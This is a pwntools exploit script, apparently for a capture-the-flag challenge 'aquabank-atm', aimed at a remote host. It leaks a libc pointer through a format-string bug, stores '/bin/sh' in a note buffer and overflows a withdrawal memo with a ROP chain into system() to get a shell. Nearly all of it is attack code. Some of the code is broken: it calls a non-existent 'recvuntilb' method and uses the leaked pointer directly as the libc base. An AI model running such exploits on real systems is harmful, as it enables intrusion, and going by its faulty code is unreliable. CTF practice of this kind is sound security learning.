# Exploit script (pwntools) for the "aquabank-atm" challenge binary.
# Three stages, as the author's notes below describe:
#   1. leak a libc pointer through the note's format-string output,
#   2. store "/bin/sh" in the note buffer at a fixed address,
#   3. overflow the withdrawal memo and return into system("/bin/sh").
# The original source was pasted with all line breaks lost; the statements
# are restored here one per line, otherwise unchanged.
from pwn import *

OFF = 128  # On withdrawal: padding up to the saved return address in the memo handler
# %25$lx  (leftover format-string offset note from the author)

context.binary = elf = ELF("./aquabank-atm", checksec=False)
libc = ELF("libc.so.6", checksec=False)
# libc = ELF("/usr/lib/libc.so.6", checksec=False)

# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13508)

PRINTF_GOT = elf.got["printf"]  # NOTE(review): assigned but never used below

# Use printf to print the libc address
# Use "save note" to store /bin/sh in the buffer
# Save the libc address and call system with /bin/sh

# Stage 1: submit a format string as the note, then read it back.
p.recvuntil(b"> ")
p.sendline(b"1")
# payload = b"%114$p" (local offset)
payload = b"%74$p"  # (remote offset)
p.sendline(payload)
p.recvuntilb(b"> ")
p.sendline(b"2")
p.recvuntil(b"--- Your customer note ---\n")
addr = int(p.recvline().strip(), 16)
# The leaked value is assigned as libc.address directly (no offset is
# subtracted); every libc address below is computed relative to it.
libc.address = addr
print(f"Address: {hex(addr)}")

# Stage 2 write the binsh string at a fixed address (note array)
binsh = b"/bin/sh"
note_addr = 0x4040A0  # presumably the note buffer in the binary's data section — verify against the ELF
p.recvuntilb(b"> ")
p.sendline(b"1")
p.sendline(binsh)
print(p.recvuntilb(b"> "))

# # Stage 3 Buffer overflow and system call
p.sendline(b"3")
print(p.recvuntil(b"From account: "))
p.sendline(b"A")
print(p.recvuntil(b"Amount: "))
p.sendline(b"10")
print(p.recvuntil(b"Withdrawal memo (be brief):\n"))

ret = 0x000000000040101A  # NOTE(review): unused; the p64(ret) entry below is commented out
ret_libc = 0x000000000002882F  # NOTE(review): unused
pop_rdi = 0x000000000010F78B  # libc-relative gadget offset, added to libc.address below

payload = flat(
    b"A" * (OFF),
    # p64(ret),
    p64(libc.address + pop_rdi),
    p64(note_addr),
    p64(
        libc.symbols["system"],
    ),
)
p.sendline(payload)
p.interactive()

# %114$p
# %130$p